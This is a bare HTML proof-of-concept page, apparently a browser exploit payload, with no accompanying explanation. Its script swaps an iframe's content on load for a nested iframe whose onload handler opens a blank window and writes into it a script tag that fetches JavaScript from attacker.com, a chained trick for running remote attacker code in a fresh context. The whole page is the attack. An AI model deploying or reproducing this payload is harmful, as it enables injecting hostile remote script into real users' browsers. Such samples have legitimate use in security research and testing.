<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGGGRBJGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGGGRBJGGGGG.addEventListener("load",()=>{GGGGGGGRBJGGGGG.srcdoc="<iframe onload='w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);'><\/iframe>";},{once:true});
};
</script>
</body>
</html>